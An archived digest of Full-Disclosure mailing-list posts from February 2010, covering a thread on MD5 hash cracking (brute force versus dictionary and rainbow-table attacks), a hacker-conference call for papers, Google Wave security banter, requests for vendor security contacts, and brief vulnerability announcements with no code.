<504.1265232402@localhost> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> <504.1265232402@localhost> Message-ID: <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> Actually dictionary attacks seem to work quite well, especially for common users which typically use dictionary and/or well known passwords (such as the infamous "password"). Another idea which seems to be cropping in, is the use of hash tables with a list of known passwords rather then dictionary approach. Personally, the hash table one is quite successful, consider that it targets password groups rather than a load of wild guesses. Cheers. On Wed, Feb 3, 2010 at 10:26 PM, wrote: > On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: > > > i find some sites which says that they can brute md5 hashes and WPA dumps > > for 1 or 2 days. > > Given enough hardware and a specified md5 hash, one could at least > hypothetically find an input text that generated that hash. However, that > may or may not be as useful as one thinks, as you wouldn't have control > over > what the text actually *was*. It would suck if you were trying to crack > a password, and got the one that was only 14 binary bytes long rather than > the one that was 45 printable characters long. ;) > > Having said that, it would take one heck of a botnet to brute-force an MD5 > has > in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 > would > take on the order of 10**22 years. If all 140 million zombied computers on > the > internet were trying 1 billion keys per second, that drops it down to > 10**16 > years or so - or about 10,000 times the universe has been around already. > > I suspect they're actually doing a dictionary attack, which has a good > chance > of succeeding in a day or two. > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/9b5375e8/attachment.html From reedarvin at gmail.com Wed Feb 3 22:38:22 2010 From: reedarvin at gmail.com (Reed Arvin) Date: Wed, 3 Feb 2010 15:38:22 -0700 Subject: [Full-disclosure] Creating An IP Input File for WinScanX Message-ID: <80115b691002031438m7e29cfka931ca60f1cdbaee@mail.gmail.com> For those of you that are using WinScanX Pro, you may find the need to create an IP input file at some point so you can cover a large range of hosts very quickly. The following script can help you to do just that. http://windowsaudit.com/downloads/CreateIPInputFile.zip Usage: - Unzip the contents of CreateIPInputFile.zip to a folder and run the CreateIPInputFile.vbs script. - Enter an IP range (i.e. 192.168.1.1-192.168.10.254) and click OK. - A new file named iprange.txt will appear in the same folder as the CreateIPInputFile.vbs script. - In WinScanX Pro click the Browse button to locate the iprange.txt file, select your scan options and click Start Scan to scan all of the hosts in the iprange.txt file. ==================== Get WinScanX Pro for just $10 this month (regularly $250)! http://www.windowsaudit.com/ From philippe at celo.ca Wed Feb 3 22:46:26 2010 From: philippe at celo.ca (Philippe Ouellet) Date: Wed, 3 Feb 2010 17:46:26 -0500 Subject: [Full-disclosure] Google apps letter Message-ID: Dear Google Apps admin,? In order to continue to improve our products and deliver more sophisticated features and performance, we are harnessing some of the latest improvements in web browser technology. This includes faster JavaScript processing and new standards like HTML5. As a result, over the course of 2010, we will be phasing out support for Microsoft Internet Explorer 6.0 ?as well as other older browsers that are not supported by their own manufacturers. We plan to begin phasing out support of these older browsers on the Google Docs suite and the Google Sites editor on March 1, 2010. After that point, certain functionality within these applications may have higher latency and may not work correctly in these older browsers. Later in 2010, we will start to phase out support for these browsers for Google Mail and Google Calendar. Google Apps will continue to support Internet Explorer 7.0 and above, Firefox 3.0 and above, Google Chrome 4.0 and above, and Safari 3.0 and above. Starting this week, users on these older browsers will see a message in Google Docs and the Google Sites editor explaining this change and asking them to upgrade their browser. We will also alert you again closer to March 1 to remind you of this change. In 2009, the Google Apps team delivered more than 100 improvements to enhance your product experience. We are aiming to beat that in 2010 and continue to deliver the best and most innovative collaboration products for businesses. Thank you for your continued support! Sincerely, The Google Apps team Email preferences: You have received this mandatory email service announcement to update you about important changes to your Google Apps product or account. Google Inc. 1600 Amphitheatre Parkway Mountain View, CA 94043 -------- Ie six should have been phased out long ago. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/0720533f/attachment.html From quanticle at gmail.com Thu Feb 4 01:28:54 2010 From: quanticle at gmail.com (Rohit Patnaik) Date: Wed, 3 Feb 2010 19:28:54 -0600 Subject: [Full-disclosure] win7x64 Direct General In-Reply-To: References: Message-ID: <6a5e46471002031728o47b693ceve9eaf0e4a0be5f55@mail.gmail.com> Poetry? Or a security advisory? You decide! -- Rohit Patnaik 2010/2/3 yuange > > win7x64 Direct General > 2010-02-03 23:38 2010-02-03 23:38 > > > ??????????????????????????????win7x64???????????????????????????????????????? Spend a day breaking the > machine a good time to finally install win7x64, the result was universal > pass to kill, I myself have had silently. > microsoft???????????????????????????????????????????????????? microsoft does not pay to spend > millions of years digging me, I'm sorry I really have the versatility of > this procedure. > > > > > > http://translate.googleusercontent.com/translate_c?hl=zh-CN&sl=zh-CN&tl=en&u=http://hi.baidu.com/yuange1975/blog/item/022dec59443c4d212834f041.html&rurl=translate.google.cn&usg=ALkJrhg-C-arlz2AxJEkRSQznuAAoSqdNg#comment > > ------------------------------ > ????????????????????MSN?????? ?????????? > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/dbf63db9/attachment-0001.html From endrazine at gmail.com Thu Feb 4 01:23:16 2010 From: endrazine at gmail.com (endrazine) Date: Thu, 04 Feb 2010 02:23:16 +0100 Subject: [Full-disclosure] Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP Message-ID: <4B6A2184.8040208@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hackito Ergo Sum 2010 - Call For Paper - HES2010 CFP http://hackitoergosum.org Hackito Ergo Sum conference will be held from April 8th to 10th 2010 in Paris, France. It is part of the series of conference "Hacker Space Fest" taking place since 2008 in France and all over Europe. HES2010 will focus on hardcore computer security, insecurity, vulnerability analysis, reverse engineering, research and hacking. INTRO The goal of this conference is to promote security research, broaden public awareness and create an open forum so that communication between the researcher, the security industry, the experts and the public can happen. A recent decision of justice in France has convicted a security researcher for disclosing vulnerabilities and exploits. These laws (similar to the one in Germany), descending from USA's DMCA law, are orienting freedom of research and knowledge into a situation where "illegal knowledge" can happen, restricted to the only ones blessed by governmental silent approval and military. Scientific research and public information cannot be made into another monopoly of state, where "some" can study and publish and "some others" cannot. Such approach just show how misinformed some politics are and how little understanding they get of the struggle they are acting in. Not understanding that the best way to improve security is to attack it shows the lack of maturity of some stakeholder by being cut out of independent information sources. This is where our ethics and responsibility is to say "No, we have a right for free information and true independence in research", and this responsibility is the one of anybody, not just the responsibility of academically blessed scientists. This conference will try to take in account all voices in order to reach a balanced position regarding research and security, inviting businesses, governmental actors, researchers, professionals and general public to share concerns, approaches and interests during. During three days, research conferences, solutions presentations, panels and debates will aim at finding synthetic and balanced solutions to the current situation. CONTENT > Research Track: We are expecting submissions in english or french, english preferred. The format will be 45 mn presentation + 10mn Q&A. For the research track, preference will be given for offensive, innovative and highly technical proposals covering (but not restricted to) the topics below: Attacking Software * Vulnerability discovery (and automating it!) * Non-x86 exploitation * Fuzzing with SMT and its limits * New classes of software vulnerabilities and new methods to detect software bugs (source or binary based) * Reverse Engineering tools and techniques * Static analysis (source or binary, Lattices to blind analysis, new languages and targets strongly encouraged) * Unpacking * Current exploitation on Gnu/Linux WITH GRsecurity / SElinux / OpenWall / SSP and other current protection methods * Kernel land exploits (new architectures or remote only) * New advances in Attack frameworks and automation Attacking Infrastructures * Exotic Network Attacks * Telecom (from VoIP to SS7 to GSM & 3G RF hacks) * Financial and Banking institutions * SCADA and the industrial world, applied. * Governmental firewall and their limits (Australia, French's HADOPI, China, Iran, Danemark, Germany, ...) * Satellites, Military, Intelligence data collection backbones ("I hacked Echelon and I would like to share") * Non-IP (SNA, ISO, make us dream...) * Red-light and other public utilities control networks * M2M Attacking Hardware * Hardware reverse engineering (and exploitation + backdooring) * Femto-cell hacking (3G, LTE, ...) * Microchip grinding, opening, imaging and reverse engineering * BIOS and otherwise low-level exploitation vectors * Real-world SMM usage! We know it's vulnerable, now let's do something * WiFi drivers and System on Chip (SoC) overflow, exploitation and backdooring. * Gnu Radio hacking applied to new domains * Toll-booth and fast-lane payment systems Attacking Crypto * Practical crypto attacks from the hackers perspective (RCE, bruteforce, ...) * SAT-solver applied to cryptanalysis * Algorithm strength modeling and evaluation metrics * Hashing functions pre-image attacks * Crypto where you wouldn't think there is We highly encourage any other presentation topic that we may not even imagine. Required informations: * Presenter's name * Bio * Presentation Title * Description * Demo? * Needs: Internet? Others? * Company (name) or Independent? * Address * Phone * Email Send your submission to: hes2010-cfp __AT__ lists.hackitoergosum.org > Business & Society Track: Format: 20 minutes slots to present a tool, an innovative product, a solution (commercial, open source, free); a customer experience or open research domain; a society issue or a subject of public interest. Demos are mandatory for tool, product or solutions presentations. Pure-marketing presentation will be moderated (i.e. interrupted). Follow-up with private group can be arranged for in-depth demo or analysis. Submission needs to be sent to: hes2010-cfp __AT__ lists.hackitoergosum.org > Other interests If you want to organize a Capture The Flag, Reverse Engineering contest, Lockpicking contest or any other activity during the conference, you are most welcome. Please contact us at: hes2010-orga at lists.hackitoergosum.org DATES 2010-01-18 Call for Paper 2010-03-01 Submission Deadline 2010-04-08 Start of conference 2010-04-10 End of conference PROGRAMMING COMMITTEE The submissions will be reviewed by the following programming committee: * Sebastien Bourdeauducq (Milkymist, /tmp/lab, BEC) * Rodrigo Branco "BSDaemon" (Coseinc) * Jonathan Brossard (P1 Code Security, DNSlab) * Emmanuel Gadaix (TSTF) * Laurent Gaffi? (Stratsec) * Thomas Garnier (Microsoft) * The Grugq (PSP) * Dhillon Kannabhiran (HITB) * Kostya Kortchinsky (Immunity) * Itzik Kotler (Radware) * Philippe Langlois (P1 Telecom Security, PSP, TSTF, /tmp/lab) * Moxie Marlinspike (Institute for Disruptive Studies) * Karsten Nohl (deGate, Reflextor) * Nicolas Thill (OpenWRT, /tmp/lab) * Julien Tinnes (Google) * Nicolas Ruff (EADS, Security Labs) * Carlos Sarraute (CORE Security Technologies) * Matthieu Suiche (Sandman, win32dd) * Fyodor Yarochkin (TSTF, o0o.nu) FEES Business-ticket 120 EUR Public entrance 80 EUR Reduction for Students below 26 40 EUR Reduction for CVE publisher or exploit publisher in 2009/2010 40 EUR Entrance fees and sponsors fees will be used to fund international speakers travel costs. VOLUNTEERS Volunteers who sign up before 2010-03-01 get free access and will need to be present onsite two days before (2010-04-06) if no further arrangement is made with the organization. SPONSORS Sponsors are welcome to contact us to receive the Partnership Kit at: hes2010-orga __AT__ lists.hackitoergosum.org LOCATION Paris, France. CONTACT hes2010-orga __AT__ lists.hackitoergosum.org Hackito Ergo Sum 2010 conference - http://hackitoergosum.org Hacker Space Festival - http://www.hackerspace.net - --- Please disseminate and forward to your friends, researchers, and anybody who may be interested. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iEYEARECAAYFAktqIYQACgkQK/YAm7PYybnlLQCfV7vpmzMGi9UVNO7cvovqhYoK kcoAn2RrwFZdDGGYfyKhLJzDFelaQyCr =1R6Y -----END PGP SIGNATURE----- From waldoalvarez00 at gmail.com Thu Feb 4 05:23:51 2010 From: waldoalvarez00 at gmail.com (wac) Date: Thu, 4 Feb 2010 00:23:51 -0500 Subject: [Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs In-Reply-To: <173d1e2f1001210228h78999999m8db26f3567499e66@mail.gmail.com> References: <6a5e46471001201510k42c90d7ft751d7aaba34c9bf1@mail.gmail.com> <20100121001556.75012.qmail@cgisecurity.net> <173d1e2f1001210228h78999999m8db26f3567499e66@mail.gmail.com> Message-ID: In any case i wonder how much google is going to respect corporate, industry secret or all that stuff you don't want them to know with google wave. Best thing to do is not to use that. I really doubt that it is an improvement and i think i will hardly ever need it. Is just more fanboi food. (knowing gmail how i know it and left for public stuff only how i left it) On Thu, Jan 21, 2010 at 5:28 AM, dramacrat wrote: > inb4 front page news > > 2010/1/21 > > > Well, that's exactly what I'm saying. Pretending that this is some kind >> new >> > exploit class simply because Google Wave is used is stupid. This is the >> > logical extension of e-mail and instant message and social network >> attacks >> > to the next potential platform. >> >> Following in the history of the security community, we should coin a >> buzzword on this old issue with a new spin. >> WaveJacking sounds like a perfect fit. >> >> >> >> > On Tue, Jan 19, 2010 at 8:10 PM, wrote: >> > >> > > On Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik said: >> > > > Yeah, no kidding. Surprise! Untrusted files can be malicious. If >> you >> > > > accept files from those whom you do not trust, whether its via >> e-mail, >> > > > instant message, Google Wave, or physical media, you well and truly >> > > deserve >> > > > the virus that'll eventually infect your machine. >> > > >> > > Let's see.. *HOW* many years ago did we first see e-mail based viruses >> that >> > > depended on people opening them because they came from people they >> already >> > > knew? 'CHRISTMA EXEC' in 1984 comes to mind. >> > > >> > > The problem here is that Google Wave is for *collaboration* - which >> means >> > > that you're communicating with people you already know, and presumably >> > > trust to some degree or other. "Hey Joe, look at this PDF and tell me >> > > what you think" is something reasonable when the request comes from >> > > somebody >> > > who Joe knows and who has sent Joe PDF's in the past. >> > > >> > > I guarantee that if every time you receive a document that appears to >> be >> > > from >> > > your boss, you call back and ask if they really intended to send a >> document >> > > or >> > > if it's a virus, your boss will get very cranky with you very fast. >> > > >> > > Let's look at that original advisory again: >> > > >> > > >> An attacker could upload his malware to a wave and share it to his >> > > >> Google Wave contacts. >> > > >> > > Now change that to "An attacker could trick/pwn some poor victim into >> > > uploading >> > > the malware to a wave...." Hilarity ensues. >> > > >> > > >> > > >> > > >> > >> > --000e0cd2e002580025047da0b22e >> > Content-Type: text/html; charset=ISO-8859-1 >> > Content-Transfer-Encoding: quoted-printable >> > >> > Well, that's exactly what I'm saying.=A0 Pretending that this is >> so= >> > me kind new exploit class simply because Google Wave is used is >> stupid.=A0 = >> > This is the logical extension of e-mail and instant message and social >> netw= >> > ork attacks to the next potential platform.
>> >
-- Rohit Patnaik

On Tue, Jan 19, >> 2010= >> > at 8:10 PM, <> Valdis.Kletnieks at vt.e= >> > du">Valdis.Kletnieks at vt.edu> wrote:
> class=3D"g= >> > mail_quote" style=3D"border-left: 1px solid rgb(204, 204, 204); margin: >> 0pt= >> > 0pt 0pt 0.8ex; padding-left: 1ex;"> >> >
On Tue, 19 Jan 2010 19:01:36 CST, Rohit Patnaik >> said:
>> > > Yeah, no kidding. =A0Surprise! Untrusted files can be malicious. >> =A0If= >> > you
>> > > accept files from those whom you do not trust, whether its via >> e-mail,= >> >
>> > > instant message, Google Wave, or physical media, you well and truly >> de= >> > serve
>> > > the virus that'll eventually infect your machine.
>> >
>> >
Let's see.. *HOW* many years ago did we first see e-mail based >> vi= >> > ruses that
>> > depended on people opening them because they came from people they >> already<= >> > br> >> > knew? =A0'CHRISTMA EXEC' in 1984 comes to mind.
>> >
>> > The problem here is that Google Wave is for *collaboration* - which >> means> > r> >> > that you're communicating with people you already know, and >> presumably<= >> > br> >> > trust to some degree or other. "Hey Joe, look at this PDF and tell >> me<= >> > br> >> > what you think" is something reasonable when the request comes from >> so= >> > mebody
>> > who Joe knows and who has sent Joe PDF's in the past.
>> >
>> > I guarantee that if every time you receive a document that appears to be >> fr= >> > om
>> > your boss, you call back and ask if they really intended to send a >> document= >> > or
>> > if it's a virus, your boss will get very cranky with you very >> fast.
>> >
>> > Let's look at that original advisory again:
>> >

>> > >> An attacker could upload his malware to a wave and share it to >> his= >> >
>> > >> Google Wave contacts.
>> >
>> >
Now change that to "An attacker could trick/pwn some poor >> victim= >> > into uploading
>> > the malware to a wave...." =A0Hilarity ensues.
>> >
>> >
>> >
>> >

>> > >> > --000e0cd2e002580025047da0b22e-- >> > >> > >> > --===============1022691582== >> > Content-Type: text/plain; charset="us-ascii" >> > MIME-Version: 1.0 >> > Content-Transfer-Encoding: 7bit >> > Content-Disposition: inline >> > >> > _______________________________________________ >> > Full-Disclosure - We believe in it. >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > --===============1022691582==-- >> > >> > >> http://www.cgisecurity.com/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/b87b2f0b/attachment.html From waldoalvarez00 at gmail.com Thu Feb 4 05:36:08 2010 From: waldoalvarez00 at gmail.com (wac) Date: Thu, 4 Feb 2010 00:36:08 -0500 Subject: [Full-disclosure] Google Maps XSS (currently unpatched) In-Reply-To: <4B4D9275.6040406@ionic.co.uk> References: <931527c61001121445x192725aav81d86a2ef6171000@mail.gmail.com> <4732.1263337533@localhost> <931527c61001121523s7aa5563cy412381cb382bc4d@mail.gmail.com> <88e844b41001121617m4f669c46o48da912c1d92b474@mail.gmail.com> <3af3d47c1001130053n30acbea4u91490cbd7970793a@mail.gmail.com> <4B4D9275.6040406@ionic.co.uk> Message-ID: > First of all, "security" is a myth. One can presume they're "secure" (or secluded) from danger sitting behind a firewall, but to do so is just foolish. Something is better than nothing ;). > People in power love to say "if you have nothing to hide then nothing to worry about" when it comes to tracking, keeping data, searching data etc etc 1984 et al...but this is wrong. I'm not doing anything wrong in my eyes, but that may mean topperling the over bearing government that wants us all chipped, so my privacy is worth a lot. Once it's too late, it will be very difficult to get privacy back. Yet worse than being chipped is that somebody is looking forward to harm you. Even if they don't know you and even if also you don't know them. Never forget about that. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/8a3ffa7a/attachment.html From xyberpix at xyberpix.com Thu Feb 4 07:57:37 2010 From: xyberpix at xyberpix.com (xyberpix) Date: Thu, 4 Feb 2010 07:57:37 +0000 Subject: [Full-disclosure] Contact at Sony Message-ID: <9D4030FA-F209-4F2A-940C-DCA1BF9E00A0@xyberpix.com> Hey all, Anyone got a security contact at Sony, need to get hold of them? TIA xyberpix From xyberpix at xyberpix.com Thu Feb 4 07:58:30 2010 From: xyberpix at xyberpix.com (xyberpix) Date: Thu, 4 Feb 2010 07:58:30 +0000 Subject: [Full-disclosure] Anyone got a contact at PGP? Message-ID: Hey again, Anyone got a contact at PGP, and I have tried mailing all the addies on their web site, with no response yet. TIA xyberpix From m.berger at project-mindstorm.net Thu Feb 4 08:28:40 2010 From: m.berger at project-mindstorm.net (Milan Berger) Date: Thu, 4 Feb 2010 09:28:40 +0100 Subject: [Full-disclosure] Anyone got a contact at PGP? In-Reply-To: References: Message-ID: <20100204092840.0d5a3648@0xC0FF33> Hi, > Anyone got a contact at PGP, and I have tried mailing all the addies > on their web site, with no response yet. wait 2-4 weeks, no response -> Full disclosure -- Kind Regards Milan Berger Project-Mindstorm Technical Engineer -- project-mindstorm.net Humboldtstrasse 69 90459 Nuremberg Germany Tel.: +49 911 27 56 381 Mob.: +49 176 22 98 76 02 http://www.project-mindstorm.net twitter: http://twitter.com/twit4c From skg102 at gmail.com Thu Feb 4 09:03:24 2010 From: skg102 at gmail.com (rockey killer) Date: Thu, 4 Feb 2010 14:33:24 +0530 Subject: [Full-disclosure] Malicious Code Execution Vulnerability In the URL Of crowdstar (Facebook Application Devloper) Message-ID: About Crowdstar The coolest social gaming company that provides games for social networking sites as like in facebook.com . There are applications on the facebook which are bieng devloped by crowdstar. Vulnerability Malicious code execution in the URL and redirection in the URL , which can be further utilised to comromise accounts of users of facebook. Vulnerability Reported on Wed, Jan 20, 2010 at 12:37 AM Vulnerability was fixed on Wed, Jan 20, 2010 at 1:24 AM Vulnerability was fixed by Suren Markosian (Technical Member of Crowdstar) Credits This Vulnerability was discovered and reported by H4CK3R Crew -- Rockey Killer It's all about Hacking and Security http://h4ck3r.in/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/aeafbfba/attachment.html From akl at experian.dk Thu Feb 4 11:58:34 2010 From: akl at experian.dk (Anders Klixbull) Date: Thu, 4 Feb 2010 12:58:34 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com><504.1265232402@localhost> <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> Message-ID: <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> seems to be cropping in? as far as know rainbow tables has been around for years... ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: 3. februar 2010 23:02 To: Valdis.Kletnieks at vt.edu Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] anybody know good service for cracking md5? Actually dictionary attacks seem to work quite well, especially for common users which typically use dictionary and/or well known passwords (such as the infamous "password"). Another idea which seems to be cropping in, is the use of hash tables with a list of known passwords rather then dictionary approach. Personally, the hash table one is quite successful, consider that it targets password groups rather than a load of wild guesses. Cheers. On Wed, Feb 3, 2010 at 10:26 PM, wrote: On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: > i find some sites which says that they can brute md5 hashes and WPA dumps > for 1 or 2 days. Given enough hardware and a specified md5 hash, one could at least hypothetically find an input text that generated that hash. However, that may or may not be as useful as one thinks, as you wouldn't have control over what the text actually *was*. It would suck if you were trying to crack a password, and got the one that was only 14 binary bytes long rather than the one that was 45 printable characters long. ;) Having said that, it would take one heck of a botnet to brute-force an MD5 has in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 would take on the order of 10**22 years. If all 140 million zombied computers on the internet were trying 1 billion keys per second, that drops it down to 10**16 years or so - or about 10,000 times the universe has been around already. I suspect they're actually doing a dictionary attack, which has a good chance of succeeding in a day or two. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/63c1a1e6/attachment.html From uuf6429 at gmail.com Thu Feb 4 11:59:59 2010 From: uuf6429 at gmail.com (Christian Sciberras) Date: Thu, 4 Feb 2010 12:59:59 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> <504.1265232402@localhost> <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> Message-ID: <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> Uh, in the sense that they are finally becoming *actually* useful... On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull wrote: > seems to be cropping in? > as far as know rainbow tables has been around for years... > > > > ------------------------------ > *From:* full-disclosure-bounces at lists.grok.org.uk [mailto: > full-disclosure-bounces at lists.grok.org.uk] *On Behalf Of *Christian > Sciberras > *Sent:* 3. februar 2010 23:02 > *To:* Valdis.Kletnieks at vt.edu > *Cc:* full-disclosure at lists.grok.org.uk > *Subject:* Re: [Full-disclosure] anybody know good service for cracking > md5? > > Actually dictionary attacks seem to work quite well, especially for common > users which typically use dictionary and/or well known passwords (such as > the infamous "password"). > Another idea which seems to be cropping in, is the use of hash tables with > a list of known passwords rather then dictionary approach. > Personally, the hash table one is quite successful, consider that it > targets password groups rather than a load of wild guesses. > > Cheers. > > > > > On Wed, Feb 3, 2010 at 10:26 PM, wrote: > >> On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: >> >> > i find some sites which says that they can brute md5 hashes and WPA >> dumps >> > for 1 or 2 days. >> >> Given enough hardware and a specified md5 hash, one could at least >> hypothetically find an input text that generated that hash. However, that >> may or may not be as useful as one thinks, as you wouldn't have control >> over >> what the text actually *was*. It would suck if you were trying to crack >> a password, and got the one that was only 14 binary bytes long rather than >> the one that was 45 printable characters long. ;) >> >> Having said that, it would take one heck of a botnet to brute-force an MD5 >> has >> in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 >> would >> take on the order of 10**22 years. If all 140 million zombied computers >> on the >> internet were trying 1 billion keys per second, that drops it down to >> 10**16 >> years or so - or about 10,000 times the universe has been around already. >> >> I suspect they're actually doing a dictionary attack, which has a good >> chance >> of succeeding in a day or two. >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/27f6c3cd/attachment.html From akl at experian.dk Thu Feb 4 12:04:56 2010 From: akl at experian.dk (Anders Klixbull) Date: Thu, 4 Feb 2010 13:04:56 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> <504.1265232402@localhost> <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> Message-ID: <282134E75BDEB64E943CAF38C80BDD8A0380E817@PRO-EXCHANGESRV.experian.dk> lol they have been useful for years son just because YOU never found a use for them doesn't mean noone else has :) ________________________________ From: Christian Sciberras [mailto:uuf6429 at gmail.com] Sent: 4. februar 2010 13:00 To: Anders Klixbull Cc: Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] anybody know good service for cracking md5? Uh, in the sense that they are finally becoming actually useful... On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull wrote: seems to be cropping in? as far as know rainbow tables has been around for years... ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: 3. februar 2010 23:02 To: Valdis.Kletnieks at vt.edu Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] anybody know good service for cracking md5? Actually dictionary attacks seem to work quite well, especially for common users which typically use dictionary and/or well known passwords (such as the infamous "password"). Another idea which seems to be cropping in, is the use of hash tables with a list of known passwords rather then dictionary approach. Personally, the hash table one is quite successful, consider that it targets password groups rather than a load of wild guesses. Cheers. On Wed, Feb 3, 2010 at 10:26 PM, wrote: On Wed, 03 Feb 2010 23:42:07 +0300, Alex said: > i find some sites which says that they can brute md5 hashes and WPA dumps > for 1 or 2 days. Given enough hardware and a specified md5 hash, one could at least hypothetically find an input text that generated that hash. However, that may or may not be as useful as one thinks, as you wouldn't have control over what the text actually *was*. It would suck if you were trying to crack a password, and got the one that was only 14 binary bytes long rather than the one that was 45 printable characters long. ;) Having said that, it would take one heck of a botnet to brute-force an MD5 has in 1 or 2 days. Given 1 billion keys/second, a true brute force of MD5 would take on the order of 10**22 years. If all 140 million zombied computers on the internet were trying 1 billion keys per second, that drops it down to 10**16 years or so - or about 10,000 times the universe has been around already. I suspect they're actually doing a dictionary attack, which has a good chance of succeeding in a day or two. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100204/45a500e6/attachment.html From uuf6429 at gmail.com Thu Feb 4 12:05:36 2010 From: uuf6429 at gmail.com (Christian Sciberras) Date: Thu, 4 Feb 2010 13:05:36 +0100 Subject: [Full-disclosure] anybody know good service for cracking md5? In-Reply-To: <282134E75BDEB64E943CAF38C80BDD8A0380E817@PRO-EXCHANGESRV.experian.dk> References: <10c48be51002031242h450c0589q953edd1fa79f3791@mail.gmail.com> <504.1265232402@localhost> <3af3d47c1002031402y125e9f02xdd4fb4b4d61cdb31@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8A0380E816@PRO-EXCHANGESRV.experian.dk> <3af3d47c1002040359l4e0e696ficd68709c2d5f029d@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8A0380E817@PRO-EXCHANGESRV.experian.dk> Message-ID: <3af3d47c1002040405n32a1ef39g3c704e6a439d99c@mail.gmail.com> FINE. Replace "useful" with "widely popular". On Thu, Feb 4, 2010 at 1:04 PM, Anders Klixbull wrote: > lol they have been useful for years son > just because YOU never found a use for them doesn't mean noone else has :) > > > > ------------------------------ > *From:* Christian Sciberras [mailto:uuf6429 at gmail.com] > *Sent:* 4. februar 2010 13:00 > *To:* Anders Klixbull > *Cc:* Valdis.Kletnieks at vt.edu; full-disclosure at lists.grok.org.uk > > *Subject:* Re: [Full-disclosure] anybody know good service for cracking > md5? > > Uh, in the sense that they are finally becoming *actually* useful... > > > > > > On Thu, Feb 4, 2010 at 12:58 PM, Anders Klixbull wrote: > >> seems to be cropping in? >> as far as know rainbow tables has been around for years... >> >> >> >> ------------------------------ >> *From:* full-disclosure-bounces at lists.grok.org.uk [mailto: >> full-disclosure-bounces at 